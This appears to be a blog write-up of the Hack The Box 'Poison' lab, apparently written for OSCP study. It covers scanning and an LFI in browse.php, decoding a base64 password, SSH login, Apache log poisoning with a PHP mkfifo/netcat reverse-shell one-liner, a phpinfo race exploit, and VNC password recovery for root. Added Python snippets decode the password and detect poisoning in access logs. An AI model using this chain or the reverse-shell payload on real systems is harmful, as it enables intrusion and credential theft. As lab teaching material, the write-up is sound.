Hack The Box: Poison Write-up (#13)

Joshua Surendran
9 min read · Aug 27, 2020

This is my 13th box out of 42 boxes. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. For most of the write-ups I get help from watching Ippsec’s YouTube videos and reading Rana Khalil’s write-ups. Please feel free to check them out. So let’s begin.

Reconnaissance

Let’s run a full TCP scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.84
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535

We get back the following result:

  • Port 22: Running OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
  • Port 80: Running Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
...SNIP...
Nmap scan report for 10.10.10.84
Host is up, received user-set (0.23s latency).
Scanned at 2020-08-26 20:58:05 +08 for 13542s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
| 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8)
....

Similarly, run a full UDP scan.

nmap -sU -O -p- -oA nmap/udp 10.10.10.84
  • -sU: UDP scan

We get back the following results.

...
514/udp open|filtered syslog no-response
...

This port shows as open|filtered, so Nmap could not tell whether anything is actually listening; there is nothing to work with here.

Before we begin, let’s make some quick mental notes.

  1. Port 22 is the SSH service. There is no known vulnerability in this version that gives an initial shell, so we won’t waste time enumerating it. One thing I am quite sure of: this build of OpenSSH 7.2 means the box is running FreeBSD 11.x.
  2. Port 80 is running the Apache HTTP web service. This is the most likely way to get an initial shell, so we have to enumerate it as much as we can.

With this in mind, let’s begin with port 80 service enumeration.

Service Enumeration

Port 80 (HTTP Web Service)

Let’s visit the page.

Default page

While I was enumerating this host from the browser, I had an issue accessing the URL by host IP. So I configured port forwarding in Burp proxy from my localhost port 8081 to the target 10.10.10.84 port 80. I will not explain how to configure this in this post; you may watch Ippsec’s YouTube video for the Node box. The message on the page is very obvious: we can call PHP scripts by providing one of the listed script names in the Scriptname field. Let’s test all of them.

info.php

We were right: this box is running FreeBSD 11.1. Next, check ini.php.

ini.php

I am not sure what this is. It just seems to be configuration information stored in an array format. Next, check listfiles.php.

listfiles.php

The pwdbackup.txt file looks very interesting. Let’s test for a Local File Inclusion (LFI) vulnerability by providing this file name in the Scriptname field.

pwdbackup.txt

Nice, we have a base64-encoded password. The message says it has been encoded at least 13 times. Copy the content and save it on our Kali Linux as pwdbackup.txt. Let’s write a simple bash script to decode this message 13 times.

root@kali:/htb/Poison# cat decode.sh 
#!/bin/bash
# Read the whole base64 blob we saved from the LFI output.
state=$(< pwdbackup.txt)
# Peel off one base64 layer per iteration, 13 times in total.
for i in {1..13}; do
    state=$(<<<"$state" base64 --decode)
done
echo "$state"

Give execute permission to the script.

chmod +x decode.sh

Run the script.

./decode.sh

We get the password.

root@kali:/htb/Poison# ./decode.sh 
Charix!2#4%6&8(0
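The bash script above peels off exactly 13 layers. Since the note only promises "at least 13", here is an added Python version (not from the original write-up) that keeps decoding until the result stops being valid base64, so the layer count does not have to be known in advance; it assumes the input is only the base64 body of pwdbackup.txt, and the sample it decodes is constructed inline.

```python
import base64
import binascii
from typing import Tuple

# Added example, not part of the original write-up. Instead of a fixed loop
# count, decode until the value is no longer valid base64 (or would turn into
# binary), which handles a note like "encoded at least 13 times".

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def peel_base64(blob: bytes, max_layers: int = 64) -> Tuple[str, int]:
    """Return (plaintext, number of base64 layers removed)."""
    state = blob
    layers = 0
    while layers < max_layers:
        compact = b"".join(state.split())  # the base64 CLI wraps at 76 columns; drop newlines
        try:
            decoded = base64.b64decode(compact, validate=True)
        except (binascii.Error, ValueError):
            break  # not base64 any more: we have reached the plaintext
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break  # plaintext that merely happens to look like a valid base64 string
        state = decoded
        layers += 1
    return state.decode("ascii").strip(), layers


def build_sample(plaintext: bytes = b"Charix!2#4%6&8(0", layers: int = 13) -> bytes:
    """Constructed sample: wrap the recovered password in `layers` base64 layers,
    adding a trailing newline per layer as the base64 CLI would."""
    for _ in range(layers):
        plaintext = base64.b64encode(plaintext) + b"\n"
    return plaintext


if __name__ == "__main__":
    password, depth = peel_base64(build_sample())
    print(f"{depth} layers removed -> {password}")
```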

It looks like an SSH password for this box. Let’s find the valid system users by abusing the LFI vulnerability to read /etc/passwd. Fire up Burp proxy, intercept the request, and send it to Repeater.

We got the system accounts.

/etc/passwd

Only root and charix have a csh login shell. Let’s test this in the next phase.

Exploitation / Just Log In

So let’s use charix as the username and Charix!2#4%6&8(0 as the password to SSH into the target.

root@kali:/htb/Poison# ssh charix@10.10.10.84
The authenticity of host '10.10.10.84 (10.10.10.84)' can't be established.
ECDSA key fingerprint is SHA256:rhYtpHzkd9nBmOtN7+ft0JiVAu8qnywLb48Glz4jZ8c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.84' (ECDSA) to the list of known hosts.
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
...
charix@Poison:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

Nice, we got logged in. Grab the user.txt flag.

user.txt

This is one way in. There are two more ways to get into this box.

Method 2: Log File Poisoning

I believe this is the intended way to exploit the box, as its name is “Poison”. To exploit this vulnerability, we need to know the log file location on FreeBSD and send PHP reverse shell code via a request header.

From this site, I know the Apache log file is located at /var/log/httpd-access.log. Let’s confirm by abusing the LFI.

httpd-access.log file

Yes, it is the correct path and we get the log output. To confirm that log file poisoning works, we can send a request with the User-Agent header set to a custom value. Let’s test it out.

Log file poisoning test

Run the following curl command to view the log file and verify that our User-Agent value was written successfully.

curl -kv 10.10.10.84/browse.php?file=/var/log/httpd-access.log

At the end of the result, we can see the entry “I Dont Know” in the User-Agent field.

...SNIP...
rg/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /nmaplowercheck1521462526 HTTP/1.1" 404 222 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET / HTTP/1.1" 200 289 "-" "-"
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.9 - - [27/Aug/2020:12:18:47 +0200] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 879 "-" "curl/7.68.0"
10.10.14.9 - - [27/Aug/2020:12:19:14 +0200] "GET /NotSure HTTP/1.1" 404 205 "http://127.0.0.1:8081/" "I+Dont+Know"
* Connection #0 to host 10.10.10.84 left intact

Since we have complete control over the User-Agent, we can change it to PHP reverse shell.

Now, intercept the request in Burp proxy and change the User-Agent value to the PHP one-liner reverse shell from Pentestmonkey.

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.10.14.9 53 >/tmp/f') ?>

Set a Netcat listener

nc -nlvp 53

Forward the request so that it is written to the log file, then include the log file through the LFI vulnerability.

Reverse shell

We get a reverse shell.
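From the defender’s side, both halves of this chain leave traces in the same access log. The following is an added example (not from the original write-up) of detection logic run over constructed Apache access-log lines modelled on the excerpt above: it flags a User-Agent or Referer that carries a PHP open tag (the poisoning write) and a browse.php?file= request that reaches for a log or system file (the LFI read).

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the original write-up: detection logic for the
# log-poisoning chain above, run over constructed Apache access-log lines
# modelled on the httpd-access.log excerpt. Two events deserve an alert: a
# PHP open tag in User-Agent/Referer, and a browse.php?file= read of a log file.

QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted log field, tolerating Apache's \" escapes
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ '
    + QUOTED + " " + QUOTED + "$"
)
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
SENSITIVE_TARGETS = ("/var/log/", "/etc/passwd", "/proc/self/environ", "php://", "../")


def classify(line: str) -> list:
    """Return the findings for one combined-format log line (empty list = benign)."""
    m = COMBINED.match(line.rstrip("\n"))
    if not m:
        return ["unparsed-line"]
    _ip, _ts, _method, path, _status, referer, ua = m.groups()
    findings = []
    # Check raw and URL-decoded headers: the tag is logged verbatim, but a proxy may encode it.
    for field, name in ((ua, "user-agent"), (referer, "referer")):
        if PHP_TAG.search(field) or PHP_TAG.search(unquote_plus(field)):
            findings.append(f"php-tag-in-{name}")
    for param in unquote_plus(path.partition("?")[2]).split("&"):
        key, _, value = param.partition("=")
        if key == "file" and any(t in value for t in SENSITIVE_TARGETS):
            findings.append(f"lfi-read:{value}")
    return findings


def scan(log_text: str) -> list:
    """Return (client ip, findings) for every line that raised a finding."""
    return [(ln.split(" ", 1)[0], f) for ln in log_text.splitlines() if (f := classify(ln))]


# Constructed sample log (not real traffic), modelled on the excerpt above.
SAMPLE_LOG = """\
10.10.14.4 - - [19/Mar/2018:13:28:50 +0100] "GET /HNAP1 HTTP/1.1" 404 203 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.9 - - [27/Aug/2020:12:18:47 +0200] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 879 "-" "curl/7.68.0"
10.10.14.9 - - [27/Aug/2020:12:19:14 +0200] "GET /NotSure HTTP/1.1" 404 205 "http://127.0.0.1:8081/" "I+Dont+Know"
10.10.14.9 - - [27/Aug/2020:12:21:03 +0200] "GET /NotSure HTTP/1.1" 404 205 "-" "<?php echo 'poisoned'; ?>"
10.10.14.9 - - [27/Aug/2020:12:22:40 +0200] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1043 "-" "curl/7.68.0"
"""
```

Running `scan(SAMPLE_LOG)` reports the log-file read, the poisoned User-Agent and the /etc/passwd read, while the Nmap and "I+Dont+Know" lines pass as benign.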

Method 3: phpinfo.php Race Condition

There is a research article about this vulnerability, released in 2011, which you can find here. To exploit it we need these two conditions:

  1. The file_uploads functionality is enabled in the PHP configuration.
  2. An LFI vulnerability to include the file uploaded via #1.

From the enumeration phase, we know the 2nd condition is satisfied. Let’s confirm the 1st condition by calling the phpinfo.php file.

phpinfo.php

Condition #1 is also satisfied. Now download the exploit script from here. We need to modify the script to include our PHP reverse shell. Kali ships with a PHP reverse shell; copy its content and replace the content of the payload value in the exploit code.

/usr/share/webshells/php/php-reverse-shell.php

Make sure to change the IP address and port number. Next, change the LFIREQ parameter value as below.

LFIREQ="""GET /browse.php?file=%s

The last thing to modify is to change every “=>” to “=&gt” so that the script interprets the phpinfo output properly.

With all that in place, let’s set up a Netcat listener in our Kali.

nc -nlvp 53

Run the script.

python phpinfolfi.py 10.10.10.84 80

We get a reverse shell.

reverse shell

Privilege Escalation

Since this box is running FreeBSD, our linux-smart-enumeration script will not work here. So we need to do manual enumeration to find a way to escalate privileges to root. Under the /home/charix directory we have a file called secret.zip.

charix@Poison:~ % ls -l
total 8
-rw-r----- 1 root charix 166 Mar 19 2018 secret.zip
-rw-r----- 1 root charix 33 Mar 19 2018 user.txt

Copy the file over to Kali Linux using the scp command.

scp charix@10.10.10.84:secret.zip .

Unzip the file

unzip secret.zip

Enter the same password we recovered earlier.

root@kali:/htb/Poison# unzip secret.zip 
Archive: secret.zip
[secret.zip] secret password:
extracting: secret
root@kali:/htb/Poison# ls -l secret
-r--r--r-- 1 root root 8 Jan 24 2018 secret

We get a file named secret. Check the file type.

root@kali:/htb/Poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators

If we check the content of this file, it is all garbage (binary data).

root@kali:/htb/Poison# cat secret
��[|Ֆz!

Next, check the processes in the target system.

ps aux

There is a root-owned process running VNC, which stands out.

Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthor

Let’s look at the full details of that process.

charix@Poison:~ % ps -auxww | grep vnc
root 529 0.0 0.9 23620 8872 v0- I 14:27 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

It’s running TightVNC with the flags -rfbport 5901 and -localhost, so the service listens on port 5901 on localhost only.

We can verify using a netstat command.

charix@Poison:~ % netstat -an | grep 5901
tcp4 0 0 127.0.0.1.5901 *.* LISTEN

To access VNC which is a graphical user interface, we need local port forwarding.

ssh -L 8000:127.0.0.1:5901 charix@10.10.10.84

The above command connects to the target machine and binds our Kali Linux local port 8000 to the target’s localhost port 5901. Once the connection is established, we can reach the target’s VNC service through our Kali Linux port 8000. Let’s execute the command above and verify that our Kali Linux is listening on port 8000.

root@kali:/htb/Poison# netstat -tulpn | grep 8000
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN 37636/ssh
tcp6 0 0 ::1:8000 :::* LISTEN 37636/ssh

With port forwarding in place, let’s connect to VNC service.

joshuaspy@kali:~$ vncviewer 127.0.0.1:8000
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:

It prompts for a password. I tried the password of user charix but it didn’t work for me. A quick Google search for the vncviewer password on FreeBSD brought me to the FreeBSD man page, where to connect vncviewer with a password we need to provide the password file.

FreeBSD man page

I remember the secret file we obtained by decompressing secret.zip; it is the password file.

Let’s test it out.

vncviewer 127.0.0.1:8000 -passwd secret

We are in! Grab the root.txt flag.

root.txt flag

A quick Google search for how to decrypt a VNC password file led me to this GitHub page.

Download the repo and compile the code using make; you should see the vncpwd executable file.

root@kali:/htb/Poison# cd /opt/vncpwd/
root@kali:/opt/vncpwd# make
gcc -Wall -g -o vncpwd vncpwd.c d3des.c
root@kali:/opt/vncpwd# ll
total 116K
-rw-r--r-- 1 root root 1.5K Aug 27 22:32 vncpwd.c
-rw-r--r-- 1 root root 877 Aug 27 22:32 README
-rw-r--r-- 1 root root 185 Aug 27 22:32 Makefile
-rw-r--r-- 1 root root 35K Aug 27 22:32 LICENSE
-rw-r--r-- 1 root root 4.8K Aug 27 22:32 d3des.h
-rw-r--r-- 1 root root 21K Aug 27 22:32 d3des.c
-rwxr-xr-x 1 root root 36K Aug 27 22:33 vncpwd

Now run the vncpwd command.

root@kali:/opt/vncpwd# ./vncpwd 
Usage: vncpwd <password file>

Run again with the secret password file.

root@kali:/opt/vncpwd# ./vncpwd /htb/Poison/secret
Password: VNCP@$$!

We have recovered the password.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Strategy map

Thank you for reading :-) Next box is Sunday.


Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.